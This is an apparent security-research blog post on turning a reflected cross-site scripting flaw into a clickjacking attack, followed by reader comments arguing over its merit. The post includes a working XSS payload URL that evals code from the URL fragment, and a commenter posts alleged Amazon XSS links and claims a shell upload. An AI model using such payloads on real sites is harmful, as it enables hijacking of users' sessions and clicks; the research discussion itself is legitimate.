Cenzic 232 Patent
Paid Advertising
web application security lab

Turning XSS into Clickjacking

Those of us who do a lot of work in the security world have come to realize that there is a ton of cross site scripting (XSS) out there. 80% of dynamic sites (or more) suffer from it. But how many sites allow you to do HTML file uploads comparatively? It’s a much smaller amount, and typically requires some sort of login before you’re allowed to do it. Often times it’s protected by login too, so it’s a relatively small amount of people who could be impacted by any sort of HTML file upload. But that is precisely what’s needed to mount a clickjacking attack (usually one or two pages). Either the attacker has to rent space in the cloud with a stolen credit card, or find some parasitic hosting somewhere.

That’s when I got to thinking… how can you use any old generic reflected XSS attack to mount a clickjacking attack? A few hours later I had a prototype that worked. Here’s how the attack would work. Let’s say a parameter like “search” was vulnerable to reflected XSS. An attacker could do something like:

http://example.com/?search=<script>eval(location.hash.slice(1))</script>

This is an old trick that basically says anything that falls into the anchor tag is what the attacker wants to run as the attack. Anchor tags are not sent to the server, they are only seen on the client. So this effectively turns the reflected XSS into a DOM based XSS, which leaves less of a signature on the server as well, incidentally. Then the attacker’s anchor payload would look something like this (this works only in Firefox):

So you have a reflected XSS on example.com that instantiates a DOM based XSS which instantiates a clickjacking attack against victim.com. Obviously you’d need to modify this to actually fit the right coordinates and work in other browsers, but this could easily be used to leverage the attack in situations where an attacker might not be able to otherwise. For instance, if the clickjacking defenses only care about the referrer and the referrer is on the correct domain just a different sub-domain, that could be used to bypass it - and so on. Anyway, I thought some people might think this is interesting. Happy penetration testing!

10 Responses to “Turning XSS into Clickjacking”

  1. WADR Says:

    RSnake, with all due respect. this is almost the most stupid attack I’ve ever seen (there are actually a couple that are worst than this).

    This is just my opinion, but it seems that you are slowly transforming into MustLive by every new post you put.

    I acknowledge there was a time when you posted interesting stuff, but this last couple of posts are just retarded.

    Take it as constructive criticism, If you don’t want to moderate-approve this post I’m cool with it. This post is more for you than for your readers.

  2. RSnake Says:

    @WADR - I appreciate the unsolicited feedback. If there is something specifically you’d like to see though, that would be infinitely more helpful.

    Others do disagree with you though, and that’s reason enough for me to publish what admittedly amounts to a few hours of research. And yes, there are a lot of dumb attacks out there, it doesn’t mean they shouldn’t be mentioned, if they work. And I respectfully disagree that the attack is stupid. Clickjacking has actually been used in over a dozen worms now. This only modifies the delivery mechanism, it doesn’t create a new (dumb) attack.

    Lastly, and I mean this in the nicest possible way - you are welcome to read other blogs, no one is forcing you to read this one. I started this site for myself to iterate my own thoughts, not to placate the masses.

  3. daphiel Says:

    Any attack/vulnerability are welcome, I think there a few peoples don’t know all that things… For work purpose and other reasons, many IT security managers and analysts cannot read all the posts about any dumb (or not) vuln around the web.

  4. RSnake Says:

    @daphiel - thank you. I appreciate that!

  5. RSnake Says:

    Posted for Tom T who got caught in the spam filter:

    @ WADR: “Ad hominem” attacks (attacks against the person, with name-calling like “stupid”) without specific facts are meaningless, illogical, and troll-ish. If you have flaws to point out in the attack, I know that RSnake welcomes you to post them. If you can’t point to specific flaws, or otherwise explain what is “stupid” about the attack, don’t waste the bandwidth, server capacity, and disk space. This goes for your opinion of the “trend”, as well. Cite specific examples, or don’t post.

    @ RSnake: Please keep iterating your thoughts, without worrying about placating the masses. (FWIW, *pissing off* the masses is often a sign that you’ve struck a nerve, i. e., made a very telling point.) And I agree that any attack that works, even in only a few cases, isn’t “stupid”. If it works, someone, somewhere, will use it against someone else, somewhere else, so it needs to be discussed, and a defense implemented.

    I and many others find many of your thoughts interesting, regardless of whether we respond, and as you said, we’re all free not to read or respond to the ones we find uninteresting.

  6. TheLightCosine Says:

    amen Tom T,
    RSnake I always look forward to reading your posts.
    However, I would make a request since you opened that door. I’d love to see some posts about methodology rather than specific technical details. Don’t stop the technical details mind you, just some posts on your actually testing methodologies would be very interesting and helpful. We are still working on developing our own AppSec program at my work, and I find it challenging to create a cohesive, repeatable, and formal testing process.

  7. niver Says:

    Rsnake,

    Have you had a chance to take a look at :

    http://www.contextis.co.uk/resources/tools/clickjacking-tool/

    Interested to know your thoughts? Doesnt seem to be much more public tools for clickjacking PoCs?

    niver

  8. Ph33r Says:

    and here’s another bug that I’ve found in amazon

    http://www.amazon.com/script-alert-product-document-cookie/dp/B003H7775E/ref=sr_1_3?s=gateway&ie=UTF8&qid=1285870078&sr=8-3

    And it’s stored into the server and opened a new DIR /script-alert-product-document-cookie/

    I believe that xss can achieve more than what’s it’s been given..

    Mad respect

  9. Ph33r Says:

    Sorry Rsnake about posting back alot, but after trying to figure out the way it works, I guess I didn’t find out the way it worked

    let’s have a look..

    http://www.amazon.com/No-Money-Low-Start-Business/dp/1448631599/ref=sr_1_2?s=gateway&ie=UTF8&qid=1285391121&sr=8-2

    Normal link to a book

    Now lets edit one section and it’s /dp/1448631599/

    replace /1448631599/ with /B003H7775E/

    then it’ll be like this

    http://www.amazon.com/No-Money-Low-Start-Business/dp/B003H7775E/ref=sr_1_2?s=gateway&ie=UTF8&qid=1285391121&sr=8-2

    And it responses back, the same way =]

  10. Ph33r Says:

    Shell is uplouded via this issue =]